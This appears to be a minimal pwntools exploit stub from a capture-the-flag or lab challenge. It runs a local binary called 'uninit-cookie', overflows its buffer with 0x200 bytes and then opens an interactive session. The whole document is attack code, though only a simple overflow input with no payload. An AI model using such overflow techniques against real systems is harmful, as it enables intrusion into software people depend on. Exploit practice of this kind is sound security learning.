from pwn import * filename = './uninit-cookie' p = process(filename) data = b'a'*0x200 ## this fills the buffer p.send(data) p.interactive()